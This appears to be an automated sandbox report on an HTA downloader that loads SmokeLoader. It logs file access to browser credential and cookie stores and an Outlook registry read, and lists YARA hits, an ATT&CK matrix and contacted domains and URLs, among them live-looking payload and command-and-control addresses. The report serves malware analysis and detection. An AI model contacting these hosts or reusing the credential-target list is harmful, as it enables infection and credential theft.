Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\datareporting\glean\pending_pings\56e3450a-57a6-47cc-8d89-0c1821e497dc
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies-journal
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\key4.db
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\addonStartup.json.lz4
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\favicons.sqlite-shm
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite-shm
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shm
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\sessionCheckpoints.json
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cookies.sqlite-wal
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\compatibility.ini
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\storage\permanent\chrome\.metadata-v2
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-shm
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cert9.db
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\extension-preferences.json
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\sessionstore.jsonlz4
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\times.json
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\datareporting\archived\2023-10\1696499493064.1fdfcf89-70db-44d6-a79f-5e3aaf4b4005.new-profile.jsonlz4
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cookies.sqlite-shm
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\sessionstore-backups\upgrade.jsonlz4-20230927232528
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\parent.lock
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\datareporting\archived\2023-10\1696499497813.505276a1-de43-4b25-8ccd-2ecebf69eb53.health.jsonlz4
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\datareporting\glean\pending_pings\ffc7ad80-9f7b-42ff-9e00-b27af7794792
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-wal
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\webappsstore.sqlite-shm
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\webappsstore.sqlite
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\prefs.js
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\targeting.snapshot.json
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-shm
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\datareporting\archived\2023-10\1696499493076.537c2d56-4d43-48f9-a98b-f5124a51bc81.event.jsonlz4
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\datareporting\state.json
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\storage.sqlite
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\SiteSecurityServiceState.txt
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\datareporting\glean\pending_pings\a628252e-0bd8-44c4-a914-eec0c019b5da

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\explorer.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Remote Access Functionality

Yara detected SmokeLoader

Source: Yara match	File source: 00000018.00000002.2534825073.0000000002A21000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2534653037.0000000000141000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3108, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 4072, type: MEMORYSTR
Source: Yara match	File source: 13.2.aspnet_regbrowsers.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.2537564234.0000000002491000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.1778514490.0000000000DB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.1779109929.0000000002791000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	111 Scripting	Valid Accounts	11 Native API	111 Scripting	1 DLL Side-Loading	1 Disable or Modify Tools	1 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Exploitation for Client Execution	1 DLL Side-Loading	623 Process Injection	11 Deobfuscate/Decode Files or Information	11 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	12 Command and Scripting Interpreter	Logon Script (Windows)	Logon Script (Windows)	2 Obfuscated Files or Information	1 Credentials in Registry	3 File and Directory Discovery	SMB/Windows Admin Shares	11 Email Collection	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	4 PowerShell	Login Hook	Login Hook	1 Software Packing	NTDS	128 System Information Discovery	Distributed Component Object Model	11 Input Capture	115 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	531 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	11 Masquerading	Cached Domain Credentials	141 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	141 Virtualization/Sandbox Evasion	DCSync	13 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	623 Process Injection	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Hidden Files and Directories	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
veryeasythingsevermadeforcreatenewthignsbetterthigns.hta	18%	ReversingLabs	Script-WScript.Downloader.Asthma
veryeasythingsevermadeforcreatenewthignsbetterthigns.hta	28%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\wihaduv	0%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
drive.google.com	0%	Virustotal	Browse
prolinice.ga	11%	Virustotal	Browse
drive.usercontent.google.com	1%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
https://api.msn.com/v1/news/Feed/Windows?	0%	URL Reputation	safe
https://api.msn.com/v1/news/Feed/Windows?	0%	URL Reputation	safe
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
https://api.msn.com:443/v1/news/Feed/Windows?	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
http://schemas.micro	0%	URL Reputation	safe
http://go.micros	0%	URL Reputation	safe
https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew	0%	URL Reputation	safe
https://aka.ms/pscore6lB	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://nuget.org/nuget.exe	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
http://nuget.org/NuGet.exe	0%	URL Reputation	safe
https://aka.ms/winsvr-2022-pshelp	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://schemas.xmlsoap.org/soap/encoding/	0%	URL Reputation	safe
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings	0%	URL Reputation	safe
https://go.micro	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
http://www.microsoft.	0%	URL Reputation	safe
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://android.notify.windows.com/iOS	0%	URL Reputation	safe
http://schemas.xmlsoap.org/wsdl/	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
http://prolinice.ga/ndex.php	1%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
drive.google.com	142.250.186.78	true	false	0%, Virustotal, Browse	unknown
drive.usercontent.google.com	142.250.185.193	true	false	1%, Virustotal, Browse	unknown
prolinice.ga	45.91.8.152	true	true	11%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Reputation
http://172.245.135.166/600/seethebestthingsentiretimewithgreatthignstoebe.tIF	false	unknown
http://prolinice.ga/index.php	true	unknown
http://vilendar.ga/index.php	true	unknown
http://172.245.135.166/600/ERFCEE.txt	false	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://api.msn.com/v1/news/Feed/Windows?	explorer.exe, 0000000E.00000000.1754609723.00000000093B4000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
https://duckduckgo.com/chrome_newtab	explorer.exe, 00000013.00000003.1990810221.0000000002D47000.00000004.00000020.00020000.00000000.sdmp, 5BA1.tmp.19.dr	false	URL Reputation: safe	unknown
http://wvhejqgucymxstkj.com/application/x-ww	explorer.exe, 0000000E.00000003.2161939139.0000000000978000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://prolinice.ga/ndex.php	explorer.exe, 00000013.00000002.2014590049.0000000002D25000.00000004.00000020.00020000.00000000.sdmp	true	1%, Virustotal, Browse	unknown
https://duckduckgo.com/ac/?q=	explorer.exe, 00000013.00000003.1990810221.0000000002D47000.00000004.00000020.00020000.00000000.sdmp, 5BA1.tmp.19.dr	false	URL Reputation: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT	explorer.exe, 0000000E.00000000.1751954020.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://wns.windows.com/bat	explorer.exe, 0000000E.00000003.2159424837.0000000009730000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1755609685.0000000009730000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.msn.com/en-us/health/wellness/7-secrets-to-a-happy-old-age-backed-by-science/ss-AA1hwpvW	explorer.exe, 0000000E.00000000.1751954020.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://api.msn.com:443/v1/news/Feed/Windows?	explorer.exe, 0000000E.00000003.2158540927.0000000002FAD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1749537667.0000000002FA0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1751954020.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/License	powershell.exe, 0000000A.00000002.1700233165.0000000005A69000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://172.245.135.166/600/seethebestthingsentiretimewithgreatthignstoebe.tIFA	powershell.exe, 00000001.00000002.1451121837.0000000007518000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	explorer.exe, 00000013.00000003.1990810221.0000000002D47000.00000004.00000020.00020000.00000000.sdmp, 5BA1.tmp.19.dr	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/news/politics/california-workers-will-get-five-sick-days-instead-of-three-	explorer.exe, 0000000E.00000000.1751954020.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b	explorer.exe, 0000000E.00000000.1751954020.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://schemas.micro	explorer.exe, 0000000E.00000000.1749297588.0000000002C00000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.1753289408.0000000007B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.1753243841.0000000007AF0000.00000002.00000001.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svg	explorer.exe, 0000000E.00000000.1751954020.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.msn.com/en-us/news/crime/bar-fight-leaves-man-in-critical-condition-suspect-arrested-in-	explorer.exe, 0000000E.00000000.1751954020.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://go.micros	powershell.exe, 00000003.00000002.1326423654.0000000005779000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://wvhejqgucymxstkj.com/	explorer.exe, 0000000E.00000003.2161939139.0000000000978000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppin	explorer.exe, 0000000E.00000003.2159660741.000000000D1B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1761907243.000000000D1B6000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://drive.goo	powershell.exe, 0000000A.00000002.1697699849.0000000000820000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1699464500.0000000000C20000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1700233165.0000000004A01000.00000004.00000800.00020000.00000000.sdmp	true		unknown
http://172.245.135.166/600/seethebestthingsentiretimewithgreatthignstoebe.tIFt	powershell.exe, 00000001.00000002.1451121837.0000000007518000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www.msn.com/en-us/money/companies/legacy-park-auction-canceled-liquidation-proposed-here-s-w	explorer.exe, 0000000E.00000000.1751954020.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew	explorer.exe, 0000000E.00000000.1751954020.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://aka.ms/pscore6lB	powershell.exe, 00000001.00000002.1442591521.00000000049B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1326423654.0000000005041000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2180174511.00000000052AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1700233165.0000000004A01000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	explorer.exe, 00000013.00000003.1990810221.0000000002D47000.00000004.00000020.00020000.00000000.sdmp, 5BA1.tmp.19.dr	false	URL Reputation: safe	unknown
https://contoso.com/	powershell.exe, 0000000A.00000002.1700233165.0000000005A69000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000001.00000002.1448623552.0000000005A1B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1328341542.00000000060AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1700233165.0000000005A69000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://powerpoint.office.comcemberZ	explorer.exe, 0000000E.00000003.2159660741.000000000D0B8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1761907243.000000000CFF4000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://drive.usercontent.google.com	powershell.exe, 0000000A.00000002.1700233165.0000000004C56000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://prolinice.ga/z	explorer.exe, 00000013.00000002.2014590049.0000000002D45000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://api.msn.com/X	explorer.exe, 0000000E.00000000.1754609723.00000000093B4000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.msn.com/en-us/news/world/pastor-of-atlanta-based-megachurch-faces-backlash-after-controv	explorer.exe, 0000000E.00000000.1751954020.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000001.00000002.1442591521.00000000049B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1326423654.0000000005041000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2180174511.00000000052D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1700233165.0000000004A01000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://172.245.135.166/600/seethebestthingsentiretimewithgreatthignstoebe.tIF_	powershell.exe, 00000001.00000002.1441509755.0000000002FCF000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsi	explorer.exe, 0000000E.00000000.1751954020.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://outlook.comNaP0B	explorer.exe, 0000000E.00000003.2159660741.000000000D1B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1761907243.000000000D1B6000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.autoitscript.com/autoit3/J	explorer.exe, 0000000E.00000003.2159424837.00000000096A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1755609685.00000000095B9000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://nuget.org/NuGet.exe	powershell.exe, 00000001.00000002.1448623552.0000000005A1B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1328341542.00000000060AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1700233165.0000000005A69000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://aka.ms/winsvr-2022-pshelp	powershell.exe, 00000003.00000002.1326423654.0000000005196000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-al	explorer.exe, 0000000E.00000000.1751954020.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	explorer.exe, 00000013.00000003.1990810221.0000000002D47000.00000004.00000020.00020000.00000000.sdmp, 5BA1.tmp.19.dr	false		unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 0000000A.00000002.1700233165.0000000004B58000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1697699849.00000000008FD000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/news/world/ukraine-live-briefing-biden-does-worry-house-drama-will-impact-	explorer.exe, 0000000E.00000000.1751954020.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000003.00000002.1326423654.0000000005196000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 0000000A.00000002.1700233165.0000000004B58000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1697699849.00000000008FD000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www.msn.com/en-us/money/realestate/my-husband-and-i-paid-off-our-mortgage-more-than-15-years	explorer.exe, 0000000E.00000000.1751954020.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://prolinice.ga/	explorer.exe, 00000013.00000002.2014590049.0000000002CD7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.2014590049.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.2014590049.0000000002D4D000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings	explorer.exe, 0000000E.00000000.1751954020.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://go.micro	powershell.exe, 00000001.00000002.1442591521.00000000050B8000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/Icon	powershell.exe, 0000000A.00000002.1700233165.0000000005A69000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark	explorer.exe, 0000000E.00000000.1751954020.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	explorer.exe, 00000013.00000003.1990810221.0000000002D47000.00000004.00000020.00020000.00000000.sdmp, 5BA1.tmp.19.dr	false	URL Reputation: safe	unknown
http://www.microsoft.	powershell.exe, 00000003.00000002.1336183059.00000000086C1000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew	explorer.exe, 0000000E.00000000.1751954020.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.msn.com/v1/news/Feed/Windows?activityId=C2BB6DDCE8D847D6B779FE8AEC27D161&timeOut=5000&oc	explorer.exe, 0000000E.00000000.1751954020.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://aka.ms/pscore6LR	powershell.exe, 00000008.00000002.2180174511.0000000005299000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://www.ecosia.org/newtab/	explorer.exe, 00000013.00000003.1990810221.0000000002D47000.00000004.00000020.00020000.00000000.sdmp, 5BA1.tmp.19.dr	false	URL Reputation: safe	unknown
https://word.office.com576	explorer.exe, 0000000E.00000003.2159660741.000000000D1B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1761907243.000000000D1B6000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://172.245.135.166/600/seeth	powershell.exe, 00000001.00000002.1442591521.0000000004D6E000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://github.com/Pester/Pester	powershell.exe, 0000000A.00000002.1700233165.0000000004B58000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1697699849.00000000008FD000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www.msn.com/en-us/news/opinion/decline-of-decorum-21-essential-manners-today-s-parents-fail-	explorer.exe, 0000000E.00000000.1751954020.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://prolinice.ga/)	explorer.exe, 00000013.00000002.2014590049.0000000002D45000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://ac.ecosia.org/autocomplete?q=	explorer.exe, 00000013.00000003.1990810221.0000000002D47000.00000004.00000020.00020000.00000000.sdmp, 5BA1.tmp.19.dr	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/weather/topstories/california-s-reservoirs-runneth-over-in-astounding-reve	explorer.exe, 0000000E.00000000.1751954020.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://172.245.135.166/600/seethebestthingsentiretimewithgreatthignstoebe.tIF1	powershell.exe, 00000001.00000002.1441509755.0000000002FCF000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://excel.office.comE	explorer.exe, 0000000E.00000003.2159660741.000000000D1B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1761907243.000000000D1B6000.00000004.00000001.00020000.00000000.sdmp	false		unknown
